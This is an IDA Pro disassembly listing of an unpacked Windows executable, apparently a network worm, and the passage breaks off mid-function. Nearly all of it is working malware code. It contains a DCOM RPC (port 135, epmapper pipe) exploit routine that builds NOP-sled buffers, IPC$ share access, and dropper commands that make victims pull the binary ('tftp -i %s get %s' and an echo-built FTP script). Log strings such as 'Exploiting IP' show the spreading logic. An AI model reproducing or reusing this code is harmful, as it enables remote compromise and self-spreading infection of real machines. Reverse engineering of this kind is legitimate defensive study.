;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 95F3D3586F41AD607D93AA1D95F08CFB
; File Name : u:\work\95f3d3586f41ad607d93aa1d95f08cfb_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00019FCC ( 106444.)
; Section size in file : 00019FCC ( 106444.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_4013EE+28�p
Dest = word ptr -354h
var_34E = byte ptr -34Eh
Source = word ptr -124h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, offset asc_41D54C ; "\\\\"
lea edi, [ebp+Dest]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, byte_428D64
push 45h
mov byte ptr [ebp+Source], al
pop ecx
xor eax, eax
lea edi, [ebp+Source+1]
rep stosd
stosw
stosb
lea eax, [ebp+Source]
push 0FFh
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
xor edi, edi
push edi
push edi
call ds:dword_41B044 ; MultiByteToWideChar
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
lea eax, [ebp+var_C]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
mov esi, [ebp+arg_4]
lea eax, [ebp+Dest]
add esp, 10h
mov [esi+14h], eax
mov eax, offset dword_428D60
push edi
push eax
push eax
push esi
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+1Ch], edi
call dword_42EC50
cmp eax, 5
mov ebx, 4C3h
jz short loc_4010C4
cmp eax, ebx
jnz short loc_4010CE
loc_4010C4: ; CODE XREF: sub_401000+BE�j
push edi
push edi
push edi
push esi
call dword_42EC50
loc_4010CE: ; CODE XREF: sub_401000+C2�j
cmp eax, 5
jz short loc_4010DC
cmp eax, ebx
jz short loc_4010DC
push 1
pop eax
jmp short loc_4010DE
; ---------------------------------------------------------------------------
loc_4010DC: ; CODE XREF: sub_401000+D1�j
; sub_401000+D5�j
xor eax, eax
loc_4010DE: ; CODE XREF: sub_401000+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010E3 proc near ; CODE XREF: sub_4013EE+7A�p
; sub_4013EE+15A�p
Dest = word ptr -354h
var_34E = byte ptr -34Eh
Source = word ptr -124h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_41D54C ; "\\\\"
lea edi, [ebp+Dest]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, byte_428D64
pop ecx
mov byte ptr [ebp+Source], al
xor eax, eax
lea edi, [ebp+Source+1]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+Source]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call ds:dword_41B044 ; MultiByteToWideChar
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
lea eax, [ebp+var_C]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
add esp, 10h
loc_401174: ; CODE XREF: sub_4010E3+AF�j
push esi
lea eax, [ebp+Dest]
push esi
push eax
call dword_42EB04
test eax, eax
jz short loc_401194
push 7D0h
call ds:dword_41B048 ; Sleep
jmp short loc_401174
; ---------------------------------------------------------------------------
loc_401194: ; CODE XREF: sub_4010E3+A2�j
push 1
pop eax
pop edi
pop esi
leave
retn
sub_4010E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40119B proc near ; CODE XREF: sub_4013EE+A9�p
; sub_4013EE+1E7�p
Src = byte ptr -3004h
Dst = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call __alloca_probe
push esi
push edi
push offset aGvujaleodq_exe ; "gvujaleodq.exe"
mov esi, 0A7h
push [ebp+arg_0]
mov [ebp+var_4], esi
call sub_408401
pop ecx
push eax ; Str
lea eax, [ebp+Src]
push 1000h ; int
push eax ; Dst
call sub_410266
mov edi, eax
add esp, 10h
test edi, edi
jz loc_4013EA
push ebx
mov ebx, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push 30h ; Size
lea eax, [ebp+Dst]
push ebx ; Src
push eax ; Dst
call _memcpy
push esi ; Size
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Src]
push edi ; Size
push eax ; Src
lea eax, [ebp+var_1F2D]
push eax ; Dst
call _memcpy
add esp, 24h
lea esi, [edi+0D7h]
loc_401220: ; CODE XREF: sub_40119B+D3�j
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jz short loc_401270
mov esi, [ebp+var_4]
push 30h ; Size
lea eax, [ebp+Dst]
inc esi
push ebx ; Src
push eax ; Dst
mov [ebp+var_4], esi
call _memcpy
push esi ; Size
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Src]
push edi ; Size
push eax ; Src
lea eax, [ebp+esi+var_1FD4]
push eax ; Dst
call _memcpy
add esp, 24h
lea esi, [esi+edi+30h]
jmp short loc_401220
; ---------------------------------------------------------------------------
loc_401270: ; CODE XREF: sub_40119B+90�j
cmp [ebp+arg_C4], 0
jz short loc_40128B
cmp [ebp+arg_C0], 3
jz short loc_401294
cmp [ebp+arg_C0], 0
jmp short loc_401292
; ---------------------------------------------------------------------------
loc_40128B: ; CODE XREF: sub_40119B+DC�j
cmp [ebp+arg_C0], 3
loc_401292: ; CODE XREF: sub_40119B+EE�j
jnz short loc_40129D
loc_401294: ; CODE XREF: sub_40119B+E5�j
push 4
push offset dword_41D548
jmp short loc_4012A4
; ---------------------------------------------------------------------------
loc_40129D: ; CODE XREF: sub_40119B:loc_401292�j
push 4 ; Size
push offset dword_41D544 ; Src
loc_4012A4: ; CODE XREF: sub_40119B+100�j
lea eax, [ebp+var_1FE0]
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h ; Size
push offset dword_41D07C ; Src
push eax ; Dst
call _memcpy
push 10h ; Size
lea eax, [ebp+var_CA4]
push offset dword_41D3E0 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Dst]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_C94]
push eax ; Dst
call _memcpy
lea edi, [esi+370h]
push 3Ch ; Size
push offset off_41D3F4 ; Src
lea eax, [ebp+edi+var_1004]
push eax ; Dst
call _memcpy
add edi, 3Ch
push 30h ; Size
push offset dword_41D434 ; Src
lea eax, [ebp+edi+var_1004]
push eax ; Dst
call _memcpy
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi ; Size
mov [ebp+var_E78], eax
call _malloc
add esp, 40h
mov ebx, eax
push esi ; Size
push 0 ; Val
push ebx ; Dst
call _memset
lea eax, [ebp+var_1004]
push edi ; Size
push eax ; Src
push ebx ; Dst
call _memcpy
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_4013EA: ; CODE XREF: sub_40119B+3E�j
pop edi
pop esi
leave
retn
sub_40119B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4013EE(int,char,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_4013EE proc near ; CODE XREF: .text:00401753�p
; sub_4027F8+1E6�p
; DATA XREF: ...
var_1338 = byte ptr -1338h
Dest = byte ptr -338h
var_234 = dword ptr -234h
var_34 = byte ptr -34h
Dst = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Memory = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
Str = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
arg_B4 = dword ptr 0BCh
push ebp
mov ebp, esp
mov eax, 1338h
call __alloca_probe
cmp [ebp+arg_A0], 1BDh
push ebx
push esi
push edi
jnz loc_40155C
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_401000
pop ecx
test eax, eax
pop ecx
jz loc_40166C
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Dest]
push offset Format ; "\\\\%s\\pipe\\epmapper"
push eax ; Dest
call _sprintf
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp+Dest]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call ds:dword_41B05C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_401473
loc_401464: ; CODE XREF: sub_4013EE+126�j
lea eax, [ebp+arg_4]
push eax
call sub_4010E3
pop ecx
jmp loc_40166C
; ---------------------------------------------------------------------------
loc_401473: ; CODE XREF: sub_4013EE+74�j
lea eax, [ebp+arg_4]
push 2
push eax
call sub_403EEB
pop ecx
lea esi, [ebp+arg_0]
pop ecx
push 1
push eax
lea eax, [ebp+var_10]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
loc_401495: ; DATA XREF: .data:off_41E474�o
; .data:0041EDB4�o
rep movsd
call sub_40119B
add esp, 0C8h
cmp eax, ebx
mov [ebp+Memory], eax
jz short loc_40150B
mov edi, 186A0h
push edi ; Size
call _malloc
mov esi, eax
push edi ; Size
push ebx ; Val
push esi ; Dst
call _memset
add esp, 10h
lea eax, [ebp+var_C]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push offset dword_41D030
push [ebp+var_4]
call ds:dword_41B058 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_4014FB
lea eax, [ebp+var_14]
push ebx
push eax
push [ebp+var_10]
push [ebp+Memory]
push [ebp+var_4]
call ds:dword_41B054 ; WriteFile
test eax, eax
jnz short loc_401519
loc_4014FB: ; CODE XREF: sub_4013EE+F3�j
push esi ; Memory
call _free
push [ebp+Memory] ; Memory
call _free
pop ecx
pop ecx
loc_40150B: ; CODE XREF: sub_4013EE+B9�j
push [ebp+var_4]
call ds:dword_41B050 ; CloseHandle
jmp loc_401464
; ---------------------------------------------------------------------------
loc_401519: ; CODE XREF: sub_4013EE+10B�j
lea eax, [ebp+var_C]
push ebx
push eax
push edi
push esi
push [ebp+var_4]
call ds:dword_41B04C ; ReadFile
push [ebp+Memory] ; Memory
mov edi, eax
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_41B050 ; CloseHandle
lea eax, [ebp+arg_4]
push eax
call sub_4010E3
cmp edi, 1
pop ecx
jnz loc_401680
jmp loc_40166C
; ---------------------------------------------------------------------------
loc_40155C: ; CODE XREF: sub_4013EE+1A�j
lea eax, [ebp+arg_4]
push 1
push eax
call sub_403EEB
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_40166C
xor ebx, ebx
push ebx
push 1
push 2
call dword_42EC30 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_40166C
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_A0]
call dword_42EBB4 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call dword_42EBF0 ; inet_addr
mov [ebp+var_20], eax
push ebx
lea eax, [ebp+var_C]
push esi
push eax
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40119B
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp+Memory], esi
jnz short loc_4015EE
push [ebp+var_4]
jmp short loc_401666
; ---------------------------------------------------------------------------
loc_4015EE: ; CODE XREF: sub_4013EE+1F9�j
mov edi, [ebp+var_4]
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_42EB60 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401606
loc_401603: ; CODE XREF: sub_4013EE+22A�j
push esi
jmp short loc_40165F
; ---------------------------------------------------------------------------
loc_401606: ; CODE XREF: sub_4013EE+213�j
push ebx
push 48h
push offset dword_41D030
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401603
mov esi, 1000h
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call dword_42EBCC ; recv
push ebx
push [ebp+var_C]
push [ebp+Memory]
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401647
push [ebp+Memory]
jmp short loc_40165F
; ---------------------------------------------------------------------------
loc_401647: ; CODE XREF: sub_4013EE+252�j
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call dword_42EBCC ; recv
push [ebp+Memory] ; Memory
cmp eax, 0FFFFFFFFh
jnz short loc_401673
loc_40165F: ; CODE XREF: sub_4013EE+216�j
; sub_4013EE+257�j
call _free
pop ecx
push edi
loc_401666: ; CODE XREF: sub_4013EE+1FE�j
call dword_42EC48 ; closesocket
loc_40166C: ; CODE XREF: sub_4013EE+31�j
; sub_4013EE+80�j ...
xor eax, eax
jmp loc_40172F
; ---------------------------------------------------------------------------
loc_401673: ; CODE XREF: sub_4013EE+26F�j
call _free
pop ecx
push edi
call dword_42EC48 ; closesocket
loc_401680: ; CODE XREF: sub_4013EE+163�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_234]
push offset aTftpFileTransf ; "[TFTP]: File transfer complete to IP: %"...
push eax ; Dest
call _sprintf
add esp, 0Ch
xor esi, esi
loc_40169A: ; CODE XREF: sub_4013EE+2CC�j
lea eax, [ebp+var_234]
push eax
call sub_402E43
test eax, eax
pop ecx
jnz short loc_4016BE
push 1388h
call ds:dword_41B048 ; Sleep
inc esi
cmp esi, 6
jl short loc_40169A
jmp short loc_40172C
; ---------------------------------------------------------------------------
loc_4016BE: ; CODE XREF: sub_4013EE+2BB�j
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
lea eax, [ebp+var_234]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+arg_B4], ebx
jnz short loc_40170A
push ebx ; int
lea eax, [ebp+var_234]
push [ebp+arg_B0] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+arg_0] ; int
call sub_405E64
add esp, 14h
loc_40170A: ; CODE XREF: sub_4013EE+2FD�j
lea eax, [ebp+var_234]
push eax
call sub_402D63
mov eax, [ebp+arg_A8]
pop ecx
imul eax, 3Ch
inc dword_41F098[eax]
lea eax, dword_41F098[eax]
loc_40172C: ; CODE XREF: sub_4013EE+2CE�j
push 1
pop eax
loc_40172F: ; CODE XREF: sub_4013EE+280�j
pop edi
pop esi
pop ebx
leave
retn
sub_4013EE endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
lea esi, [esp+10h]
sub esp, 0BCh
mov dword ptr [esp+16Ch], 87h
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4013EE
push 2Fh
lea esi, [esp+0D0h]
pop ecx
mov dword ptr [esp+16Ch], 1BDh
mov edi, esp
mov ebx, eax
rep movsd
call sub_401FD7
add esp, 0BCh
test ebx, ebx
jnz short loc_401786
test eax, eax
jz short loc_401789
loc_401786: ; CODE XREF: .text:00401780�j
push 1
pop eax
loc_401789: ; CODE XREF: .text:00401784�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 5214h
call __alloca_probe
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push 1
push eax
call sub_403EEB
pop ecx
test eax, eax
pop ecx
jz loc_401978
cmp eax, 1
jz loc_401978
push 0
push 1
push 2
call dword_42EC30 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_401978
push 10h
lea eax, [ebp-14h]
push 0
push eax
call _memset
add esp, 0Ch
mov word ptr [ebp-14h], 2
push dword ptr [ebp+0A8h]
call dword_42EBB4 ; htons
mov [ebp-12h], ax
lea eax, [ebp+0Ch]
push eax
call dword_42EBF0 ; inet_addr
push offset aGvujaleodq_exe ; "gvujaleodq.exe"
mov [ebp-10h], eax
push dword ptr [ebp+8]
call sub_408401
pop ecx
mov esi, 1000h
push eax
lea eax, [ebp-5214h]
push esi
push eax
call sub_410266
add esp, 10h
mov [ebp-4], eax
test eax, eax
jz loc_401978
push 122h
push offset aS ; "è"
lea eax, [ebp-4214h]
push esi
push eax
call sub_4102EE
mov ebx, eax
push 25Ch
lea eax, [ebp-2214h]
push offset a127_0_0_1Ipc ; "127.0.0.1\\IPC$\\"
push eax
call _memcpy
lea eax, [ebp-4214h]
push ebx
push eax
lea eax, [ebp-21F0h]
push eax
call _memcpy
push dword ptr [ebp-4]
lea eax, [ebp-5214h]
push eax
lea eax, [ebp-21F0h]
push eax
call _memcpy
push 4
lea eax, [ebp-1FE0h]
push offset dword_41DD7C
push eax
call _memcpy
add esp, 40h
lea eax, [ebp-1FDCh]
push 4
push offset dword_41DD78
push eax
call _memcpy
mov eax, 12Eh
add esp, 0Ch
add [ebp-0EB4h], eax
add [ebp-0EACh], eax
mov eax, 250h
push 10h
add [ebp-120Ch], eax
add [ebp-1204h], eax
add [ebp-1194h], eax
add [ebp-1190h], eax
add [ebp-1160h], eax
add [ebp-115Ch], eax
add [ebp-1144h], eax
add [ebp-1088h], eax
lea eax, [ebp-14h]
push eax
push edi
call dword_42EB60 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401914
loc_401911: ; CODE XREF: .text:00401928�j
; .text:00401941�j ...
push edi
jmp short loc_401972
; ---------------------------------------------------------------------------
loc_401914: ; CODE XREF: .text:0040190F�j
xor ebx, ebx
push ebx
push 48h
push offset dword_41D6E4
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401911
push ebx
lea eax, [ebp-3214h]
push esi
push eax
push edi
call dword_42EBCC ; recv
cmp byte ptr [ebp-3212h], 0Ch
jnz short loc_401911
push ebx
lea eax, [ebp-1214h]
push ebx
push eax
push edi
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401911
push ebx
lea eax, [ebp-3214h]
push esi
push eax
push edi
call dword_42EBCC ; recv
cmp byte ptr [ebp-3212h], 3
push edi
jnz short loc_40197F
loc_401972: ; CODE XREF: .text:00401912�j
call dword_42EC48 ; closesocket
loc_401978: ; CODE XREF: .text:004017AC�j
; .text:004017B5�j ...
xor eax, eax
loc_40197A: ; CODE XREF: .text:00401A34�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40197F: ; CODE XREF: .text:00401970�j
call dword_42EC48 ; closesocket
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-214h]
push offset aTftpFileTransf ; "[TFTP]: File transfer complete to IP: %"...
push eax
call _sprintf
add esp, 0Ch
xor esi, esi
loc_40199F: ; CODE XREF: .text:004019BF�j
lea eax, [ebp-214h]
push eax
call sub_402E43
test eax, eax
pop ecx
jnz short loc_4019C3
push 1388h
call ds:dword_41B048 ; Sleep
inc esi
cmp esi, 6
jl short loc_40199F
jmp short loc_401A31
; ---------------------------------------------------------------------------
loc_4019C3: ; CODE XREF: .text:004019AE�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
lea eax, [ebp-214h]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax
call _sprintf
add esp, 10h
cmp [ebp+0BCh], ebx
jnz short loc_401A0F
push ebx
lea eax, [ebp-214h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_405E64
add esp, 14h
loc_401A0F: ; CODE XREF: .text:004019F0�j
lea eax, [ebp-214h]
push eax
call sub_402D63
mov eax, [ebp+0B0h]
pop ecx
imul eax, 3Ch
inc dword_41F098[eax]
lea eax, dword_41F098[eax]
loc_401A31: ; CODE XREF: .text:004019C1�j
push 1
pop eax
jmp loc_40197A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A39 proc near ; CODE XREF: sub_401B98+42A�p
var_5A0 = byte ptr -5A0h
Dest = byte ptr -1A0h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+Dst], 2
push eax
call dword_42EBF0 ; inet_addr
mov [ebp+var_C], eax
mov ax, word_41E670
push eax
call dword_42EBB4 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_42EC30 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_401B71
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_42EB60 ; connect
cmp eax, 0FFFFFFFFh
jz loc_401B71
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_42EBCC ; recv
mov edi, offset aGvujaleodq_exe ; "gvujaleodq.exe"
push edi
push edi
push [ebp+arg_0]
call sub_408401
pop ecx
mov esi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
push dword_42E668
push [ebp+arg_0]
call sub_408401
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push ebx
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401B71
push 1F4h
call ds:dword_41B048 ; Sleep
push edi
push offset aS_0 ; "%s\r\n"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push ebx
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401B75
loc_401B71: ; CODE XREF: sub_401A39+51�j
; sub_401A39+67�j ...
xor al, al
jmp short loc_401B93
; ---------------------------------------------------------------------------
loc_401B75: ; CODE XREF: sub_401A39+136�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_42EBCC ; recv
push ebx
call dword_42EC48 ; closesocket
mov al, 1
loc_401B93: ; CODE XREF: sub_401A39+13A�j
pop edi
pop esi
pop ebx
leave
retn
sub_401A39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B98 proc near ; CODE XREF: sub_401FD7+116�p
; sub_401FD7+138�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
Src = byte ptr -104h
var_103 = byte ptr -103h
Dst = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
Str = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call __alloca_probe
mov eax, dword_41E808
push ebx
mov [ebp+var_10], eax
mov eax, dword_41E80C
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax ; Dest
call _sprintf
add esp, 0Ch
xor ebx, ebx
xor esi, esi
lea eax, [ebp+var_103]
loc_401BD7: ; CODE XREF: sub_401B98+4E�j
mov cl, [ebp+esi+Str]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_401BD7
push 60h ; Size
lea eax, [ebp+Dst]
push offset dword_41E280 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_84]
push eax ; Dst
call _memcpy
add esp, 1Ch
lea eax, [ebp+Str]
push 9 ; Size
push (offset aC_2+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
push 1 ; Size
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax ; Src
lea eax, [ebp+var_B1]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
push 1 ; Size
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax ; Src
lea eax, [ebp+var_87]
push eax ; Dst
call _memcpy
mov ax, word_41E670
add esp, 2Ch
push eax
call dword_42EBB4 ; htons
xor eax, 9999h
push 2 ; Size
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax ; Src
push offset dword_41DF80 ; Dst
call _memcpy
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_401D94
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi ; Size
push 90h ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_C0]
